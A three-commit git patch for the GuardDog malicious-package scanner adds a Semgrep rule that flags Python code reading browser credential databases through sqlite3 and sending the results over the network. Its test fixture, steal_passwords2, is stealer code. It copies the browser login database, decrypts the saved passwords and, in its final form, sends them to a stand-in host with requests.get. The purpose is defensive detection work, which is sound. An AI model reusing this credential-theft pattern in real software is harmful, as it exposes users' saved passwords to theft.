From 18c4539b8e2538b366edf6c03a9b2f18a1a4fc43 Mon Sep 17 00:00:00 2001 From: Ian Kretz <44385082+ikretz@users.noreply.github.com> Date: Thu, 18 Jul 2024 09:35:49 +0200 Subject: [PATCH 1/3] Add Python sqlite3 data exfiltration rule coverage --- .../sourcecode/exfiltrate-sensitive-data.yml | 14 ++++++++++++ .../sourcecode/exfiltrate-sensitive-data.py | 22 +++++++++++++++++++ 2 files changed, 36 insertions(+) diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml index 81887d68..20ed3607 100644 --- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml +++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml @@ -31,6 +31,19 @@ rules: - metavariable-regex: metavariable: $ENVVAR regex: ([\"\'](AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN)[\"\']) + - patterns: + - pattern-inside: | + $CONNECT = sqlite3.connect(...) + ... + $CURSOR = $CONNECT.cursor(...) + ... + $CURSOR.close(...) + - pattern: $CURSOR.execute($QUERY, ...) + - metavariable-pattern: + metavariable: $QUERY + patterns: + - pattern: "..." + - pattern-regex: (?i)select\s+[card_number_encrypted|encrypted_value|isHttpOnly|name|origin_url|password_value|username].*\s+from\s+[cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins] pattern-sinks: - pattern-either: - pattern-inside: requests.$METHOD(...) @@ -42,6 +55,7 @@ rules: - pattern-inside: $S = socket.socket(...); ... - pattern-inside: $S.connect(...); ... - pattern-inside: $S.send(...) + - pattern-inside: $F.write(...) languages: - python severity: WARNING diff --git a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py index 80021ad8..c5e9b9b3 100644 --- a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py +++ b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py @@ -226,3 +226,25 @@ def run(self): ploads = {'hostname':hostname,'cwd':cwd,'username':username} # ruleid: exfiltrate-sensitive-data requests.get("https://eo6ksiuyau5e5x2.m.pipedream.net",params = ploads) + + +""" RULEID: sqlite3 data exfiltration +""" + +def steal_passwords2(self, name: str, path: str, profile: str): + path = "path" + if not os.path.isfile(path): + return + loginvault = self.random_dir_create() + copy2(path, loginvault) + conn = sqlite3.connect(loginvault) + cursor = conn.cursor() + with open(os.path.join(self.dir, "Browsers", "All Passwords.txt"), 'a', encoding="utf-8") as f: + for res in cursor.execute("SELECT origin_url, username, password_value FROM logins").fetchall(): + url, username, password = res + password = self.dcrpt_val(password, self.masterkey) + if url != "": + # ruleid: exfiltrate-sensitive-data + f.write(f"URL: {url}\nID: {username}\nPASSWORD: {password} \n\n") + cursor.close() + conn.close() From 73dbe2b53b0276dd3a2d4c6f3a5081206db2b2ff Mon Sep 17 00:00:00 2001 From: Ian Kretz <44385082+ikretz@users.noreply.github.com> Date: Thu, 18 Jul 2024 17:27:43 +0200 Subject: [PATCH 2/3] Incorporate change requests --- guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml | 4 +--- tests/analyzer/sourcecode/exfiltrate-sensitive-data.py | 3 ++- 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml index 20ed3607..2ccbd175 100644 --- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml +++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml @@ -37,13 +37,12 @@ rules: ... $CURSOR = $CONNECT.cursor(...) ... - $CURSOR.close(...) - pattern: $CURSOR.execute($QUERY, ...) - metavariable-pattern: metavariable: $QUERY patterns: - pattern: "..." - - pattern-regex: (?i)select\s+[card_number_encrypted|encrypted_value|isHttpOnly|name|origin_url|password_value|username].*\s+from\s+[cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins] + - pattern-regex: (?i)select\s+\S+.*\s+from\s+(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins) pattern-sinks: - pattern-either: - pattern-inside: requests.$METHOD(...) @@ -55,7 +54,6 @@ rules: - pattern-inside: $S = socket.socket(...); ... - pattern-inside: $S.connect(...); ... - pattern-inside: $S.send(...) - - pattern-inside: $F.write(...) languages: - python severity: WARNING diff --git a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py index c5e9b9b3..05ba1867 100644 --- a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py +++ b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py @@ -244,7 +244,8 @@ def steal_passwords2(self, name: str, path: str, profile: str): url, username, password = res password = self.dcrpt_val(password, self.masterkey) if url != "": + params = {'url': url, 'username': username, 'password': password} # ruleid: exfiltrate-sensitive-data - f.write(f"URL: {url}\nID: {username}\nPASSWORD: {password} \n\n") + requests.get("https://example.com", params=params) cursor.close() conn.close() From c2cf5b1067b9119feb7dd9d8b5d43968e2eb0950 Mon Sep 17 00:00:00 2001 From: Ian Kretz <44385082+ikretz@users.noreply.github.com> Date: Thu, 18 Jul 2024 18:48:51 +0200 Subject: [PATCH 3/3] Match only on targeted table names --- guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml index 2ccbd175..605ee395 100644 --- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml +++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml @@ -42,7 +42,7 @@ rules: metavariable: $QUERY patterns: - pattern: "..." - - pattern-regex: (?i)select\s+\S+.*\s+from\s+(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins) + - pattern-regex: (?i)(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins) pattern-sinks: - pattern-either: - pattern-inside: requests.$METHOD(...)